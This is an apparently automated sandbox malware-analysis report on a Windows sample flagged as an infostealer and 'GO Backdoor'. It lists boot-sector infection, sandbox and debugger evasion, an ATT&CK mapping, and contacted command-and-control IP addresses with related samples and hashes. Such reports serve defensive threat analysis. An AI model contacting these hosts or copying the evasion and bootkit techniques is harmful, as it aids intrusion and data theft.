    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: DeviceIoControl,CreateFileA,DeviceIoControl,_malloc,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d1_2_004A9D00

    Boot Survival

    barindex
    Contains functionality to infect the boot sector
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: CreateFileA,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d1_2_004776F9
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: RegQueryValueExW,_malloc,SetLastError,CreateFileA,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d1_2_00477690
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: CreateFileA,CreateFileA,DeviceIoControl,CloseHandle,_memset,CloseHandle, \\.\PhysicalDrive%d1_2_004A97B0
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: CreateFileA,CreateFileA,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PhysicalDrive%d1_2_004A9B70
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: DeviceIoControl,CreateFileA,DeviceIoControl,_malloc,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d1_2_004A9D00
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00484124 IsIconic,GetWindowPlacement,GetWindowRect,1_2_00484124
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

    Malware Analysis System Evasion

    barindex
    Contains functionality to compare user and computer (likely to detect sandboxes)
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: EnterCriticalSection,LeaveCriticalSection,_memset,GetModuleFileNameW,PathAppendW,PathAppendW,StrStrIW,PathAppendW,_memset,SHGetValueW,PathAppendW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleFileNameW,PathAppendW,PathAppendW,PathAppendW,_memset,SHGetValueW,PathAppendW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,LeaveCriticalSection,1_2_0044DC40
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_031FB880 rdtscp 1_2_031FB880
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeAPI coverage: 0.3 %
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0046C990 FindFirstFileW,1_2_0046C990
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0046D300 _memset,FindFirstFileW,FindNextFileW,FindNextFileW,1_2_0046D300
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004479B0 WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,PathIsDirectoryW,_memset,FindFirstFileW,InterlockedCompareExchange,Sleep,Sleep,FindNextFileW,FindClose,WaitForSingleObject,WaitForSingleObject,InterlockedCompareExchange,_memset,Sleep,Sleep,_memset,PathFileExistsW,1_2_004479B0
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00449B60 FindFirstFileW,1_2_00449B60
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0046DE90 GetLogicalDriveStringsW,GetLogicalDriveStringsW,_memset,GetLogicalDriveStringsW,_wcsnlen,_wcsnlen,1_2_0046DE90
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_031CF280 GetProcessAffinityMask,GetSystemInfo,1_2_031CF280
    Source: Week11.exe.bin.exeBinary or memory string: aQeMu
    Source: Week11.exe.bin.exeBinary or memory string: `C}P~Up@c^ueq|ycbqemu
    Source: Week11.exe.bin.exeBinary or memory string: [TOOUGPQFNQM@CQSEDBGIOOTDQVGOPLABPQGF@BQROTESTBIVJGEWVA@FCPFRTESUCKTHEGUT@AGEVMCIESUCKTHEGUTCAGEVMMZXSUCJVJGDVW@AFDPKJRQNUCKTHEFTUBCEGTOOTDFHCKTJGDVVFF@ARHG]LYJ^KTHEFTUCBDFVLLWAVSfVTHEFVVA@FCPKJRB[]JdIHEFTT@@FDWKJQ@USDCcUEFTW@AGEWLLPAWQFMSwXFTUBCEGTMMVGQQGOPM
    Source: Week11.exe.bin.exeBinary or memory string: [TOOUGPQFNQM@CQSEDBGIOOTDQVGOPLABPQGF@BQROTESTBIVJGEWVA@FCPFRTESUCKTHEGUT@AGEVMCIESUCKTHEGUTCAGEVMMZXSUCJVJGDVW@AFDPKJRQNUCKTHEFTUBCEGTOOTDFHCKTJGDVVFF@ARHG]LYJ^KTHEFTUCBDFVLLWAVSfVTHEFVVA@FCPKJRB[]JdIHEFTT@@FDWKJQ@USDCcUEFTW@AGEWLLPAWQFMSwXFTUBCEGTMMVGQQGOPM[TUBBDEVMMWFPVGOQNC
    Source: Week11.exe.bin.exe, 00000001.00000002.2482160127.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_031FB880 rdtscp 1_2_031FB880
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0048AC3C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_0048AC3C
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0047A660 GetCurrentThreadId,GetProcessHeap,OpenThread,OpenThread,GetLastError,GetProcessHeap,HeapFree,OutputDebugStringW,CloseHandle,1_2_0047A660
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0043E2B0 SetErrorMode,ImmDisableIME,GetCommandLineW,CreateMutexW,GetLastError,CloseHandle,StrStrIW,StrStrIW,StrStrIW,FindWindowW,PostMessageW,FindWindowW,PostMessageW,CoInitialize,OleInitialize,LoadLibraryW,GetProcAddress,IsUserAnAdmin,StrStrIW,CloseHandle,DefWindowProcW,InitCommonControlsEx,OleUninitialize,CoUninitialize,CloseHandle,GetModuleHandleW,GetProcAddress,1_2_0043E2B0
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0047A0E0 GetProcessHeap,HeapLock,HeapWalk,HeapWalk,HeapWalk,HeapUnlock,1_2_0047A0E0
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0048AC3C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_0048AC3C
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0048B2A4 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_0048B2A4
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0048B9CE __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0048B9CE
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_031E51F0 RtlAddVectoredExceptionHandler,SetUnhandledExceptionFilter,1_2_031E51F0
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004AA320 cpuid 1_2_004AA320
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,1_2_004A0059
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW,1_2_004945BC
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,1_2_004A06C7
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement,1_2_004A091F
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: GetLocaleInfoA,1_2_004A49B4
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,1_2_004A0BE5
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: GetLocaleInfoA,GetLocaleInfoA,GetACP,1_2_004A10F0
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,1_2_004A1207
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,1_2_004A129F
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,1_2_004A1313
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,1_2_004A14E5
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,1_2_004A15A6
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,1_2_004A1649
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,1_2_004A160D
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: GetLocaleInfoA,1_2_004A39CC
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,GetLocaleInfoA,1_2_004A1AE2
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: _LocaleUpdate::_LocaleUpdate,GetLocaleInfoW,1_2_004A1AAE
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,1_2_004A1C21
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeQueries volume information: C:\Users\user\AppData\Local\config VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0049CB77 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,1_2_0049CB77
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00496B9D __lock,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,____lc_codepage_func,__getenv_helper_nolock,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,1_2_00496B9D
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0047E640 _memset,GetVersionExW,GetVersionExW,GetVersionExW,GetModuleHandleW,GetProcAddress,1_2_0047E640
    Source: Week11.exe.bin.exeBinary or memory string: \safemon\360tray.exe
    Source: Week11.exe.bin.exeBinary or memory string: SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe

    Stealing of Sensitive Information

    barindex
    Yara detected GO Backdoor
    Source: Yara matchFile source: Process Memory Space: Week11.exe.bin.exe PID: 7116, type: MEMORYSTR

    Remote Access Functionality

    barindex
    Yara detected GO Backdoor
    Source: Yara matchFile source: Process Memory Space: Week11.exe.bin.exe PID: 7116, type: MEMORYSTR
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0043DD80 RpcAsyncInitializeHandle,CreateEventW,RpcStringBindingComposeW,RpcBindingFromStringBindingW,WaitForSingleObject,RpcAsyncCompleteCall,CloseHandle,RpcStringFreeW,RpcBindingFree,1_2_0043DD80
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0043DECD CloseHandle,RpcStringFreeW,RpcBindingFree,1_2_0043DECD

    Mitre Att&ck Matrix

    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
    Native API    		1
    Bootkit    		1
    DLL Side-Loading    		1
    Masquerading    		OS Credential Dumping2
    System Time Discovery    		Remote Services1
    Archive Collected Data    		1
    Encrypted Channel    		Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/Job1
    DLL Side-Loading    		Boot or Logon Initialization Scripts1
    Deobfuscate/Decode Files or Information    		LSASS Memory151
    Security Software Discovery    		Remote Desktop ProtocolData from Removable Media1
    Non-Standard Port    		Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)3
    Obfuscated Files or Information    		Security Account Manager1
    Application Window Discovery    		SMB/Windows Admin SharesData from Network Shared Drive1
    Ingress Tool Transfer    		Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
    Bootkit    		NTDS2
    File and Directory Discovery    		Distributed Component Object ModelInput Capture1
    Non-Application Layer Protocol    		Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    DLL Side-Loading    		LSA Secrets34
    System Information Discovery    		SSHKeylogging1
    Application Layer Protocol    		Scheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain CredentialsWi-Fi DiscoveryVNCGUI Input Capture1
    Proxy    		Data Transfer Size LimitsService Stop

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    Week11.exe.bin.exe37%ReversingLabsWin32.Infostealer.Tinba

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://188.130.206.243heaXtT44tdKipmZh:U1K/ZFS/B554WCj6H79.pow8BpV.hQr2pbE3AbJ2hKD.cW01SSc0hAZ6j7b0%Avira URL Cloudsafe
    http://188.130.206.243/0%Avira URL Cloudsafe
    http://188.130.206.2430%Avira URL Cloudsafe
    http://188.130.206.243http://46.8.232.1060%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    No contacted domains info

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://46.8.232.106/false
      		high
      http://46.8.236.61/false
        		high
        http://93.185.159.253/false
          		high
          http://188.130.206.243/false
          • Avira URL Cloud: safe
          		unknown
          http://91.212.166.91/false
            		high

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://46.8.232.106Week11.exe.bin.exe, 00000001.00000002.2483895164.000000000C0F4000.00000004.00001000.00020000.00000000.sdmpfalse
              		high
              http://188.130.206.243heaXtT44tdKipmZh:U1K/ZFS/B554WCj6H79.pow8BpV.hQr2pbE3AbJ2hKD.cW01SSc0hAZ6j7bWeek11.exe.bin.exe, 00000001.00000002.2483895164.000000000C0F2000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://188.130.206.243http://46.8.232.106Week11.exe.bin.exe, 00000001.00000002.2483895164.000000000C0F2000.00000004.00001000.00020000.00000000.sdmp, Week11.exe.bin.exe, 00000001.00000002.2483895164.000000000C0F4000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://188.130.206.243Week11.exe.bin.exe, 00000001.00000002.2483895164.000000000C0F4000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://93.185.159.253Week11.exe.bin.exe, 00000001.00000002.2483895164.000000000C0F4000.00000004.00001000.00020000.00000000.sdmpfalse
                		high
                http://46.8.236.61Week11.exe.bin.exe, 00000001.00000002.2483895164.000000000C0F4000.00000004.00001000.00020000.00000000.sdmpfalse
                  		high
                  http://www.360totalsecurity.com/d/ts/%s/%s/channelOpenWeek11.exe.bin.exefalse
                    		high
                    http://s.360safe.com/safei18n/Week11.exe.bin.exefalse
                      		high
                      http://91.212.166.91Week11.exe.bin.exe, 00000001.00000002.2483895164.000000000C0F4000.00000004.00001000.00020000.00000000.sdmpfalse
                        		high
                        https://store.360totalsecurity.com/shared.xmlfalse
                          		high

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          46.8.232.106
                          		unknownRussian Federation
                          		28917FIORD-ASIP-transitoperatorinRussiaUkraineandBalticsfalse
                          188.130.206.243
                          		unknownRussian Federation
                          		200509SVINT-ASNESfalse
                          185.157.213.253
                          		unknownSpain
                          		50129TVHORADADAEStrue
                          93.185.159.253
                          		unknownRussian Federation
                          		39912I3B-ASATfalse
                          91.212.166.91
                          		unknownUnited Kingdom
                          		35819MOBILY-ASEtihadEtisalatCompanyMobilySAfalse
                          46.8.236.61
                          		unknownRussian Federation
                          		28917FIORD-ASIP-transitoperatorinRussiaUkraineandBalticsfalse

                          General Information

                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1553244
                          Start date and time:2024-11-10 16:47:13 +01:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 5m 56s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:12
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:Week11.exe.bin.exe
                          Detection:MAL
                          Classification:mal80.troj.evad.winEXE@1/1@0/6
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:
                          • Successful, ratio: 80%
                          • Number of executed functions: 118
                          • Number of non-executed functions: 162
                          Cookbook Comments:
                          • Found application associated with file extension: .exe

                          Warnings

                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                          • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size exceeded maximum capacity and may have missing disassembly code.
                          • VT rate limit hit for: Week11.exe.bin.exe

                          Simulations

                          Behavior and APIs

                          No simulations

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          46.8.232.106m0Yc9KltGw.exeGet hashmaliciousGO BackdoorBrowse
                          • 46.8.232.106/
                          SecuriteInfo.com.FileRepMalware.7838.24766.exeGet hashmaliciousGO BackdoorBrowse
                          • 46.8.232.106/
                          BwqqVoHR71.exeGet hashmaliciousGO BackdoorBrowse
                          • 46.8.232.106/
                          BwqqVoHR71.exeGet hashmaliciousGO BackdoorBrowse
                          • 46.8.232.106/
                          sV9ElC4fU4.exeGet hashmaliciousGO BackdoorBrowse
                          • 46.8.232.106/
                          antispam_connect1.exeGet hashmaliciousGO BackdoorBrowse
                          • 46.8.232.106/
                          antispam_connect1.exeGet hashmaliciousGO BackdoorBrowse
                          • 46.8.232.106/
                          wa_3rd_party_host_32.exeGet hashmaliciousGO BackdoorBrowse
                          • 46.8.232.106/
                          wa_3rd_party_host_32.exeGet hashmaliciousGO BackdoorBrowse
                          • 46.8.232.106/
                          5ndBtx7pRX.exeGet hashmaliciousGO BackdoorBrowse
                          • 46.8.232.106/
                          188.130.206.243m0Yc9KltGw.exeGet hashmaliciousGO BackdoorBrowse
                          • 188.130.206.243/
                          SecuriteInfo.com.FileRepMalware.7838.24766.exeGet hashmaliciousGO BackdoorBrowse
                          • 188.130.206.243/
                          BwqqVoHR71.exeGet hashmaliciousGO BackdoorBrowse
                          • 188.130.206.243/
                          BwqqVoHR71.exeGet hashmaliciousGO BackdoorBrowse
                          • 188.130.206.243/
                          antispam_connect1.exeGet hashmaliciousGO BackdoorBrowse
                          • 188.130.206.243/
                          93.185.159.253m0Yc9KltGw.exeGet hashmaliciousGO BackdoorBrowse
                          • 93.185.159.253/
                          SecuriteInfo.com.FileRepMalware.7838.24766.exeGet hashmaliciousGO BackdoorBrowse
                          • 93.185.159.253/
                          BwqqVoHR71.exeGet hashmaliciousGO BackdoorBrowse
                          • 93.185.159.253/
                          BwqqVoHR71.exeGet hashmaliciousGO BackdoorBrowse
                          • 93.185.159.253/
                          sV9ElC4fU4.exeGet hashmaliciousGO BackdoorBrowse
                          • 93.185.159.253/
                          antispam_connect1.exeGet hashmaliciousGO BackdoorBrowse
                          • 93.185.159.253/
                          antispam_connect1.exeGet hashmaliciousGO BackdoorBrowse
                          • 93.185.159.253/
                          wa_3rd_party_host_32.exeGet hashmaliciousGO BackdoorBrowse
                          • 93.185.159.253/
                          wa_3rd_party_host_32.exeGet hashmaliciousGO BackdoorBrowse
                          • 93.185.159.253/
                          5ndBtx7pRX.exeGet hashmaliciousGO BackdoorBrowse
                          • 93.185.159.253/

                          Domains

                          No context

                          ASNs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          SVINT-ASNESm0Yc9KltGw.exeGet hashmaliciousGO BackdoorBrowse
                          • 188.130.206.243
                          https://t.ly/Oppenheim0511Get hashmaliciousGO BackdoorBrowse
                          • 188.130.206.243
                          SecuriteInfo.com.FileRepMalware.7838.24766.exeGet hashmaliciousGO BackdoorBrowse
                          • 188.130.206.243
                          https://t.ly/BavariaFilmGmbH2410Get hashmaliciousUnknownBrowse
                          • 188.130.206.243
                          BwqqVoHR71.exeGet hashmaliciousGO BackdoorBrowse
                          • 188.130.206.243
                          BwqqVoHR71.exeGet hashmaliciousGO BackdoorBrowse
                          • 188.130.206.243
                          antispam_connect1.exeGet hashmaliciousGO BackdoorBrowse
                          • 188.130.206.243
                          na.elfGet hashmaliciousMirai, MoobotBrowse
                          • 188.130.200.140
                          FIORD-ASIP-transitoperatorinRussiaUkraineandBalticsm0Yc9KltGw.exeGet hashmaliciousGO BackdoorBrowse
                          • 46.8.236.61
                          https://t.ly/Oppenheim0511Get hashmaliciousGO BackdoorBrowse
                          • 46.8.232.106
                          SecuriteInfo.com.FileRepMalware.3248.17662.exeGet hashmaliciousUnknownBrowse
                          • 46.8.237.66
                          fCr6yd61xw.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                          • 46.8.237.66
                          fCr6yd61xw.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                          • 46.8.237.66
                          Zo1o3PhmtM.exeGet hashmaliciousUnknownBrowse
                          • 46.8.237.66
                          67JPbskewt.exeGet hashmaliciousUnknownBrowse
                          • 46.8.237.66
                          SecuriteInfo.com.FileRepMalware.7838.24766.exeGet hashmaliciousGO BackdoorBrowse
                          • 46.8.236.61
                          nabspc.elfGet hashmaliciousUnknownBrowse
                          • 109.248.104.45
                          https://t.ly/BavariaFilmGmbH2410Get hashmaliciousUnknownBrowse
                          • 46.8.232.106
                          MOBILY-ASEtihadEtisalatCompanyMobilySAyakuza.m68k.elfGet hashmaliciousUnknownBrowse
                          • 86.51.171.28
                          shindemips.elfGet hashmaliciousUnknownBrowse
                          • 86.51.211.142
                          5r3fqt67ew531has4231.x86.elfGet hashmaliciousMirai, OkiruBrowse
                          • 176.224.147.28
                          xX1k6Ghe8s.elfGet hashmaliciousMiraiBrowse
                          • 31.167.93.149
                          hiss.arm7.elfGet hashmaliciousUnknownBrowse
                          • 176.17.147.223
                          sora.ppc.elfGet hashmaliciousUnknownBrowse
                          • 46.44.86.64
                          bin.m68k.elfGet hashmaliciousMiraiBrowse
                          • 37.127.89.210
                          sDX1AXN1Zp.elfGet hashmaliciousMirai, MoobotBrowse
                          • 178.81.153.33
                          pSU7fuySjo.elfGet hashmaliciousMirai, MoobotBrowse
                          • 62.120.247.164
                          e5AiOG6uDI.elfGet hashmaliciousMirai, MoobotBrowse
                          • 37.217.63.91
                          I3B-ASATXWHcHAzqPR.exeGet hashmaliciousUnknownBrowse
                          • 195.16.240.249
                          byte.sh4.elfGet hashmaliciousMirai, OkiruBrowse
                          • 195.16.237.179
                          m0Yc9KltGw.exeGet hashmaliciousGO BackdoorBrowse
                          • 93.185.159.253
                          https://t.ly/Oppenheim0511Get hashmaliciousGO BackdoorBrowse
                          • 93.185.159.253
                          la.bot.sh4.elfGet hashmaliciousUnknownBrowse
                          • 195.16.243.93
                          SecuriteInfo.com.FileRepMalware.7838.24766.exeGet hashmaliciousGO BackdoorBrowse
                          • 93.185.159.253
                          https://t.ly/BavariaFilmGmbH2410Get hashmaliciousUnknownBrowse
                          • 93.185.159.253
                          BwqqVoHR71.exeGet hashmaliciousGO BackdoorBrowse
                          • 93.185.159.253
                          BwqqVoHR71.exeGet hashmaliciousGO BackdoorBrowse
                          • 93.185.159.253
                          botnet.x86.elfGet hashmaliciousMirai, MoobotBrowse
                          • 78.142.85.12
                          TVHORADADAEShttp://virtual.urban-orthodontics.comGet hashmaliciousUnknownBrowse
                          • 185.76.79.50
                          https://virtual.urban-orthodontics.comGet hashmaliciousUnknownBrowse
                          • 185.76.79.50
                          https://virtual.urban-orthodontics.comGet hashmaliciousUnknownBrowse
                          • 185.76.79.50
                          https://virtual.urban-orthodontics.comGet hashmaliciousUnknownBrowse
                          • 185.76.79.50
                          nullnet_load.arm.elfGet hashmaliciousMiraiBrowse
                          • 156.67.60.56
                          nullnet_load.x86.elfGet hashmaliciousMiraiBrowse
                          • 156.67.60.68
                          GkyZlYczv9.dllGet hashmaliciousBumbleBeeBrowse
                          • 95.156.207.204
                          garm.elfGet hashmaliciousMiraiBrowse
                          • 156.67.60.61
                          tel.arm.elfGet hashmaliciousMiraiBrowse
                          • 156.67.60.38
                          tmips.elfGet hashmaliciousMiraiBrowse
                          • 156.67.60.33

                          JA3 Fingerprints

                          No context

                          Dropped Files

                          No context

                          Created / dropped Files

                          C:\Users\user\AppData\Local\config

                          Download File
                          Process:C:\Users\user\Desktop\Week11.exe.bin.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):416
                          Entropy (8bit):6.2489104762331475
                          Encrypted:false
                          SSDEEP:12:vaXqyZ0FasUGy6LqjceprRqLjS/YAUzv17X94C:vaayZ0ssUt6L3eprIK0X94C
                          MD5:FF0C9980550DB88C572D6ED72876FD60
                          SHA1:5041D85958F291D8EF77FD99AD33EA7D6FA3B2AD
                          SHA-256:2A76C349185C1F14EED769B13ED4D7F93E98DD432CCC9C78B1A8111E4BC4AE19
                          SHA-512:F7A09D09D91301E0931CA79C06B877249B40368D4DA710B73701D97222DAC9E4C0013BA5060D112D2094952CDE373C147F7AA1E1FBE4358FF36E3F1B4CF37E4B
                          Malicious:false
                          Reputation:low
